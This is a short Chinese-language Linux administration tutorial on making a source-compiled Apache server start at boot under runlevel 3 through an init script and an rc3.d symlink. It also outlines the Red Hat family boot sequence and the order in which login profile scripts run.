1、在linux下安装了apache 服务（通过下载二进制文件经济编译安装、而非rpm包）、apache 服务启动命令：          /server/apache/bin/apachectl start 。让apache服务运行在运行级别3下面。   命令如下：

1）touch /etc/rc.d/init.d/apache
   vi /etc/rc.d/init.d/apache
   chown -R root /etc/rc.d/init.d/apache
   chmod 700 /etc/rc.d/init.d/apache
   ln -s /etc/rc.d/init.d/apache /etc/rc.d/rc3.d/S60apache #S 是start的简写、代表启动、K是kill的简写、代表关闭。60数字        代表启动的顺序。（对于iptv系统而言、许多服务都是建立在数据库启动的前提下才能够正常启动的、可以通过该数字就行调整脚本的    启动顺序））
  
   apache的内容：
   #!/bin/bash
   #Start httpd service
   /server/apache/bin/apachectl start
  
   至此 apache服务就可以在运行级别3下 随机自动启动了。（可以结合chkconfig 对启动服务进行相应的调整）。
由于相关变量定义不同, 所以以下启动顺序仅供参考
在Redhat Redflag centos fc linux系统里面脚本的启动

先后：
第一步：通过/boot/vm进行启动 vmlinuz
第二步：init /etc/inittab
第三步：启动相应的脚本，并且打开终端
rc.sysinit
rc.d(里面的脚本）
rc.local
第四步：启动login登录界面 login
第五步:在用户登录的时候执行sh脚本的顺序：每次登录的时候都会完全执行的
/etc/profile.d/file
/etc/profile
/etc/bashrc
/root/.bashrc
/root/.bash_profile